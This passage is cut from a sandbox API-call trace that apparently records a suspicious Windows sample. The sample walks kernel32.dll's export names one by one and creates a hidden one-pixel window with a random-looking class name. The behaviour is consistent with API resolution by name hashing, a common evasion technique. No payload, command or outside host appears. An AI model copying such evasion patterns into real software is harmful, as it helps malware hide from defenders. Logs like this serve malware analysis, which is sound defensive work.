(lpString="CREATESEMAPHOREW") returned 16 [0178.427] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0178.427] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0178.427] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0178.427] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0178.427] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0178.427] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0178.427] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0178.428] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0178.428] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0178.428] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0178.428] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0178.428] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0178.428] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0178.428] lstrlenA (lpString="CREATETHREAD") returned 12 [0178.428] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0178.429] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0178.429] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0178.429] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0178.429] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0178.429] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0178.429] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0178.429] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0178.429] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0178.429] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0178.429] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0178.429] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0178.429] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0178.429] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0178.429] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0178.429] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0178.429] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0178.429] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0178.429] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0178.429] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0178.429] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0178.429] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0178.429] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0178.429] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0178.429] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0178.429] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0178.429] lstrcpyA (in: lpString1=0x33eee64, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0178.429] lstrlenA (lpString="CTRLROUTINE") returned 11 [0178.429] lstrcpyA (in: lpString1=0x33eee64, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0178.429] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0178.429] lstrcpyA (in: lpString1=0x33eee64, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0178.429] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0178.429] lstrcpyA (in: lpString1=0x33eee64, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0178.429] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0178.429] lstrcpyA (in: lpString1=0x33eee64, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0178.429] lstrlenA (lpString="DEBUGBREAK") returned 10 [0178.429] lstrcpyA (in: lpString1=0x33eee64, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0178.429] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0178.429] lstrcpyA (in: lpString1=0x33eee64, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0178.430] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0178.430] lstrcpyA (in: lpString1=0x33eee64, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0178.430] lstrlenA (lpString="DECODEPOINTER") returned 13 [0178.430] lstrcpyA (in: lpString1=0x33eee64, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0178.430] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0178.430] lstrcpyA (in: lpString1=0x33eee64, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0178.430] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0178.430] lstrcpyA (in: lpString1=0x33eee64, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0178.430] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0178.430] lstrcpyA (in: lpString1=0x33eee64, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0178.430] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0178.430] lstrcpyA (in: lpString1=0x33eee64, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0178.430] lstrlenA (lpString="DELETEATOM") returned 10 [0178.430] lstrcpyA (in: lpString1=0x33eee64, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0178.430] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0178.430] lstrcpyA (in: lpString1=0x33eee64, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0178.430] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0178.430] lstrcpyA (in: lpString1=0x33eee64, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0178.430] lstrlenA (lpString="DELETEFIBER") returned 11 [0178.430] lstrcpyA (in: lpString1=0x33eee64, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0178.430] lstrlenA (lpString="DELETEFILEA") returned 11 [0178.430] lstrcpyA (in: lpString1=0x33eee64, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0178.430] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0178.430] lstrcpyA (in: lpString1=0x33eee64, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0178.430] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0178.430] lstrcpyA (in: lpString1=0x33eee64, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0178.430] lstrlenA (lpString="DELETEFILEW") returned 11 [0178.430] lstrcpyA (in: lpString1=0x33eee64, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0178.430] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0178.430] lstrcpyA (in: lpString1=0x33eee64, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0178.430] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0178.430] lstrcpyA (in: lpString1=0x33eee64, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0178.430] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0178.430] lstrcpyA (in: lpString1=0x33eee64, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0178.430] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0178.430] lstrcpyA (in: lpString1=0x33eee64, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0178.430] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0178.431] lstrcpyA (in: lpString1=0x33eee64, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0178.431] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0178.431] lstrcpyA (in: lpString1=0x33eee64, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0178.431] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0178.431] lstrcpyA (in: lpString1=0x33eee64, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0178.431] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0178.431] lstrcpyA (in: lpString1=0x33eee64, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0178.431] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0178.431] lstrcpyA (in: lpString1=0x33eee64, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0178.431] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0178.431] lstrcpyA (in: lpString1=0x33eee64, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0178.431] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0178.431] lstrcpyA (in: lpString1=0x33eee64, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0178.431] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0178.431] lstrcpyA (in: lpString1=0x33eee64, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0178.431] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0178.431] lstrcpyA (in: lpString1=0x33eee64, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0178.431] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0178.431] lstrcpyA (in: lpString1=0x33eee64, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0178.431] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0178.431] lstrcpyA (in: lpString1=0x33eee64, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0178.431] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0178.431] lstrcpyA (in: lpString1=0x33eee64, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0178.431] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0178.431] lstrcpyA (in: lpString1=0x33eee64, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0178.431] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0178.431] lstrcpyA (in: lpString1=0x33eee64, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0178.431] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0178.431] lstrcpyA (in: lpString1=0x33eee64, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0178.431] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0178.431] lstrcpyA (in: lpString1=0x33eee64, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0178.431] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0178.431] lstrcpyA (in: lpString1=0x33eee64, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0178.431] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0178.431] lstrcpyA (in: lpString1=0x33eee64, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0178.431] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0178.431] lstrcpyA (in: lpString1=0x33eee64, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0178.431] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0178.431] lstrcpyA (in: lpString1=0x33eee64, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0178.432] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0178.432] lstrcpyA (in: lpString1=0x33eee64, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0178.432] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0178.432] lstrcpyA (in: lpString1=0x33eee64, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0178.432] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0178.432] lstrcpyA (in: lpString1=0x33eee64, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0178.432] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0178.432] lstrcpyA (in: lpString1=0x33eee64, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0178.432] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0178.432] lstrcpyA (in: lpString1=0x33eee64, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0178.432] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0178.432] lstrcpyA (in: lpString1=0x33eee64, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0178.432] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0178.432] lstrcpyA (in: lpString1=0x33eee64, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0178.432] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0178.432] lstrcpyA (in: lpString1=0x33eee64, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0178.432] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0178.432] lstrcpyA (in: lpString1=0x33eee64, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0178.433] lstrcpyW (in: lpString1=0x5e0000, lpString2="qwertyuiopasdfghjklzxcvbnm1234567890 " | out: lpString1="qwertyuiopasdfghjklzxcvbnm1234567890 ") returned="qwertyuiopasdfghjklzxcvbnm1234567890 " [0178.433] RegisterClassExW (param_1=0x33efae8) returned 0xc12c [0178.434] CreateWindowExW (dwExStyle=0x0, lpClassName="he1mjfuov ", lpWindowName="he1mjfuov ", dwStyle=0x0, X=-2147483648, Y=-2147483648, nWidth=1, nHeight=1, hWndParent=0x0, hMenu=0x0, hInstance=0xb0000, lpParam=0x0) returned 0x2015c [0178.494] VirtualFree (lpAddress=0x5d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0178.494] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0178.494] VirtualFree (lpAddress=0x5c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0178.495] GetMessageA (lpMsg=0x33efb24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0) Thread: id = 341 os_tid = 0x5bc [0178.438] VirtualAlloc (lpAddress=0x0, dwSize=0xf7, flAllocationType=0x3000, flProtect=0x4) returned 0x5f0000 [0178.438] GetTickCount () returned 0x11340f7 [0178.441] VirtualAlloc (lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x4) returned 0x600000 [0178.442] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x610000 [0178.442] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x620000 [0178.445] GetTickCount () returned 0x1134107 [0178.445] GetTickCount () returned 0x1134107 [0178.445] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x630000 [0178.445] lstrlenA (lpString="kernel32.dll") returned 12 [0178.445] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0178.445] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0178.445] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0178.445] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0178.445] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0178.445] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0178.445] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0178.446] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0178.446] lstrlenA (lpString="ADDATOMA") returned 8 [0178.446] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0178.446] lstrlenA (lpString="ADDATOMW") returned 8 [0178.446] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0178.446] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0178.446] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0178.446] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0178.446] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0178.446] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0178.446] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0178.446] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0178.446] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0178.446] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0178.446] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0178.446] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0178.446] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0178.446] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0178.446] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0178.446] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0178.446] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0178.446] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0178.446] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0178.446] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0178.446] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0178.446] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0178.446] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0178.446] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0178.446] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0178.446] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0178.446] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0178.446] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0178.446] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0178.446] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0178.446] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0178.446] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0178.446] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0178.446] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0178.447] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0178.447] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0178.447] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0178.447] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0178.447] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0178.447] lstrlenA (lpString="BACKUPREAD") returned 10 [0178.447] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0178.447] lstrlenA (lpString="BACKUPSEEK") returned 10 [0178.447] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0178.447] lstrlenA (lpString="BACKUPWRITE") returned 11 [0178.447] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0178.447] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0178.447] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0178.447] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0178.447] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0178.447] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0178.447] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0178.447] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0178.447] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0178.447] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0178.447] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0178.447] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0178.447] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0178.447] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0178.447] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0178.447] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0178.447] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0178.447] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0178.447] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0178.447] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0178.447] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0178.447] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0178.447] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0178.447] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0178.447] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0178.447] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0178.447] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0178.447] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0178.448] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0178.448] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0178.448] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0178.448] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0178.448] lstrcpyA (in: 